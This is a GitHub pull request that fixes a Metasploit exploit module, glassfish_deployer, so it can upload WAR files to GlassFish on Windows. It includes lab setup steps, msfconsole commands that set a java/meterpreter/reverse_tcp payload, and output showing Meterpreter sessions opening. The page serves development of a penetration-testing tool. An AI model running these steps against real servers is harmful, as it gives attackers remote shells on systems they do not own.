Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix #7247, Glassfish failing to upload the war file on Windows setups #7255

Merged
merged 2 commits into from Sep 14, 2016
Merged

Fix #7247, Glassfish failing to upload the war file on Windows setups #7255

merged 2 commits into from Sep 14, 2016

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Aug 30, 2016
edited by jbarnett-r7

What This Patch Does

This patch fixes a problem in exploits/multi/http/glassfish_deployer. On Windows setups, the Glassfish module fails to upload the war file due to some missing fields in the HTTP POST request. However, this does not actually affect Linux setups even with the same Java version or GlassFish version.

Fix #7247

Verification for Linux

  • Get a clean Ubuntu box
  • On the Ubuntu box, install Java like this: sudo apt-get install default-jdk, this should get you JDK8.
  • Download GlassFish 4.0
  • Unzip glassfish-4.0, navigate to the bin directory, and then start asadmin
  • In the asadmin console, do start-domain domain1. This will start GlassFish.
  • Still on the Ubuntu box, open http://localhost:4848 with a browser
  • On on the left menu, click on "Domain"
  • On the right, click on "Administrator password"
  • Set a new password for admin
  • On the left menu, click on "server (Admin server)"
  • On the right, click on the "Secure Administrator" button
  • Click on "Enable Secure Admin"
  • You will have to wait for up to a minute to make sure Glassfish is up and running again. You can check this by checking port 4848.

At this point, you are ready to test the module:

  • Start msfconsole
  • Do: use exploit/multi/http/glassfish_deployer
  • Do: set RHOST [IP to GlassFish]
  • Do: set PASSWORD [password to admin]
  • Do: set SSL true
  • Do: set target 1
  • Do: set payload java/meterpreter/reverse_tcp
  • Do: set LHOST [YOUR IP ADDRESS]
  • Do: exploit
  • You should get a session like the following:
msf exploit(glassfish_deployer) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.0
[*] Trying to login as admin:sploit
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /goTKJKUgGDWQ59unsbqG0g0W9a9a/ba05giTjZqnIEGi.jsp...
[*] Sending stage (46112 bytes) to 192.168.146.174
[*] Meterpreter session 4 opened (192.168.146.1:4444 -> 192.168.146.174:38476) at 2016-08-30 16:06:45 -0500
[*] Getting information to undeploy...
[*] Undeploying goTKJKUgGDWQ59unsbqG0g0W9a9a...
[*] Sending stage (46112 bytes) to 192.168.146.174
[*] Meterpreter session 5 opened (192.168.146.1:4444 -> 192.168.146.174:38402) at 2016-08-30 16:07:04 -0500
[*] Undeployment complete.

meterpreter >

Verification for Windows

And then at that point, you are ready to test the module:

  • Start msfconsole
  • Do: use exploit/multi/http/glassfish_deployer
  • Do: set RHOST [IP to GlassFish]
  • Do: set PASSWORD [password to admin]
  • Do: set SSL true
  • Do: set target 1
  • Do: set payload java/meterpreter/reverse_tcp
  • Do: set LHOST [YOUR IP ADDRESS]
  • Do: exploit
  • You should get a session like the following:
msf exploit(glassfish_deployer) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.1
[*] Trying to login as admin:sploit
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /jUYou3/eukJz1.jsp...
[*] Sending stage (46112 bytes) to 192.168.146.165
[*] Meterpreter session 6 opened (192.168.146.1:4444 -> 192.168.146.165:55916) at 2016-08-30 16:14:05 -0500
 [*] Getting information to undeploy...
[*] Undeploying jUYou3...
[*] Undeployment complete.

meterpreter >

@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Aug 30, 2016
@wchen-r7 wchen-r7 assigned wchen-r7 and unassigned wchen-r7 Aug 30, 2016
@jbarnett-r7 jbarnett-r7 self-assigned this Sep 14, 2016
@jbarnett-r7 jbarnett-r7 merged commit 445a43b into rapid7:master Sep 14, 2016
jbarnett-r7 added a commit that referenced this pull request Sep 14, 2016
@jbarnett-r7
Land #7255, Fix issue causing Glassfish to fail uploading to Windows …
6509b34 
…targets.
@tdoan-r7
Copy link
Contributor

Release Notes

This patch fixes a problem in exploits/multi/http/glassfish_deployer. On Windows setups, the Glassfish module fails to upload the war file due to some missing fields in the HTTP POST request. However, this does not actually affect Linux setups even with the same Java version or GlassFish version.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@jbarnett-r7 jbarnett-r7

Labels
bug module rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

glassfish_deployer cannot upload the malicious war file
3 participants
@wchen-r7 @tdoan-r7 @jbarnett-r7